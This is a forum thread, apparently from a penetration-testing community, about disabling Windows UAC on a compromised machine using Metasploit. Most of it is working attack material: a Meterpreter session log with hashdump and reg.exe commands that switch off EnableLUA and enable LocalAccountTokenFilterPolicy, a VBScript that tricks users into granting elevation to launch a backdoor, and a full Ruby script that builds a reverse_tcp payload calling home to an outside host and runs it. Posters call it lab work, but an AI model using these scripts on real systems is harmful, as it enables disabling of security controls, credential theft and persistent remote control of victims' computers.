how to disable UAC or user access control

[spudgunman]

this isnt anything crazy but it uses only metasploit scripts and no external sources which is cool.

scripts used in this video
Bash | # $Id: killuac.rb spudgunman $ # # Meterpreter s - Getcountermeasure v2 script

http://www.backtrack-linux.org/forum...tml#post182720


I also found this information later on after all this...
http://www.pretentiousname.com/misc/...t2.html#videos

[ThePistonDoctor]

I'm assuming that you own/operate the machine in question. If so, just turn it off. If not, you need a remote registry injection. The key you want is going to be EnableLUA (DWORD, value of 0 obviously) in HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentV ersionPoliciesSystem

[spudgunman]

yea this is all lab work in VMware, and to help quantify that I am not a 100% nube my purpose for this is I just rebuilt the getcountermeasure script (http://www.backtrack-linux.org/forum...tml#post182720) and I want to try and improve it more to add functionality to disable UAC with my new rewrite of this script. and sure... it works if you manually turn it off but that defeats the purpose of my inquiry.

you cant inject that key unless you have UAC disabled or elevated permissions so you cant change that key when UAC is enabled.

so I am looking on how do you create a package that will socially engineer the user to click "allow on UAC" to inject that code and disable UAC or just install a msfservice as system for example with the same social exploit of clicking allow. (much like a software install would do) -- or is there any way to disable UAC with a script (I tried with a VB Script with sendkeys but turns out UAC will ignore sendkeys doh)

[ThePistonDoctor]

Try this on for size:

Bypassing UAC with User Privilege under Windows Vista/7 · Technology Articles

The exploit was known as of 11/27, but I highly doubt it's been addressed and if it has, I suspect there are plenty of vulnerable systems still out there.

If you want it to work for you for POC you will need to make sure that you have a vulnerable kernel (specifically win32k.sys).

[spudgunman]

thanks will check that out now.. using VBS to elevate and install a backdoor gets me this effect.. damn UAC appears to be blocking even SYSTEM from having fun??! is this anyone elses experience?

Code:

meterpreter > sysinfo
Computer: WIN-MSUB6TKFKFA
OS      : Windows 7 (Build 7600, ).
Arch    : x86
Language: en_US
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > migrate 467

meterpreter > hashdump
just another way to do the same things this can be done a lot of ways...
meterpreter > shell
Process 268 created.
Channel 10 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
The operation completed successfully.

update:
after checking out that link.. interesting no need for the user to click "hack me please" I will check this out in more detail

BTW my elevation script is as follows... the only down side is UAC asks if "wscript host" can have rights... suppose you could also do this with MSI or nullsoft installer

Code:

If WScript.Arguments.length =0 Then
  'rerun the script with elevated UAC and prevent a loop
  Set objShell = CreateObject("Shell.Application")
  objShell.ShellExecute WScript.FullName, WScript.ScriptFullName & " noloop", vbNullString, "runas"
Else
  Set objShell = WScript.CreateObject("WScript.Shell")
  Set objFSO = CreateObject("Scripting.FileSystemObject")
  'locate the current path of the scrip
  strPath = Wscript.ScriptFullName
  Set objFile = objFSO.GetFile(strPath)
  strFolder = objFSO.GetParentFolderName(objFile)
  'script to run in elevated UAC here
  objShell.Run(strFolder & "\" & "backup.exe")
End If

after some thinking on this ...we then need to to patch UAC and reboot the box...
again this is done any way.. just using DOS to keep it simple

Code:

C:\>whoami
whoami
nt authority\system

C:\>C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
The operation completed successfully.

C:\>C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
The operation completed successfully.

C:\>shutdown /l /f
shutdown /l /f

C:\>[*] Meterpreter session 2 closed.  Reason: Died

any thoughts on how to do (all of this) this better? (the attack not the reg edits.. I will eventually .rb script that stuff.

[spudgunman]

to keep things clean here is the last post in a script

Code:

# $Id: killuac.rb spudgunman $
#
# Meterpreter script to prompt for permissions to run in elevated mode and then call home
# some code pulled from the persistence.rb script
# Script by Kelly Keeton<kellykeeton [at] hotmail>
# Version: 0.5
#
# Default parameters
#
rhost = "192.168.254.129"
rport = 31337
payload = "windows/meterpreter/reverse_tcp"
##

tempdir = client.fs.file.expand_path("%TEMP%")
payloadfile = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"

platform = client.platform.scan(/(win32|win64)/)
unsupported if not platform

print_status("Creating a payload to run elevated UAC: LHOST=#{rhost} LPORT=#{rport}")
pay = client.framework.payloads.create("#{payload}")
pay.datastore['LHOST'] = rhost
pay.datastore['LPORT'] = rport
raw  = pay.generate

payloadvbs = ::Msf::Util::EXE.to_win32pe_vbs(client.framework, raw, {:persist => true, :delay => 5})
print_status("Payload script is #{payloadvbs.length} bytes long")

uacvbs = "
If WScript.Arguments.length =0 Then
  Set objShell = CreateObject(\"Shell.Application\")
  objShell.ShellExecute WScript.FullName, WScript.ScriptFullName & \" noloop\", vbNullString, \"runas\"
Else
  Set objShell = WScript.CreateObject(\"WScript.Shell\")
  Set objFSO = CreateObject(\"Scripting.FileSystemObject\")
  strPath = Wscript.ScriptFullName
  Set objFile = objFSO.GetFile(strPath)
  strFolder = objFSO.GetParentFolderName(objFile)
  tmp = \"wscript \" & Chr(34) & \"#{payloadfile}\" & Chr(34)
  objShell.Run(tmp)
End If"
#
# Upload to the filesystem
#
elevationfile = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
print_status("UAC elevation script written to #{elevationfile}")
fd = client.fs.file.new(elevationfile, "wb")
fd.write(uacvbs)
fd.close

print_status("payload script written to #{payloadfile}")
fd = client.fs.file.new(payloadfile, "wb")
fd.write(payloadvbs)
fd.close
#
# Execute the script
#
proc = session.sys.process.execute("wscript \"#{elevationfile}\"", nil, {'Hidden' => false})
print_status("Script executed with PID #{proc.pid}")
#EOF

I also updated the getcountermeasure script to properly kill UAC on windows7 (didnt test vista)

http://www.backtrack-linux.org/forum...tml#post182720



MOD. can you move to experts (or wherever you see fit) as this is no longer a "im stuck thread"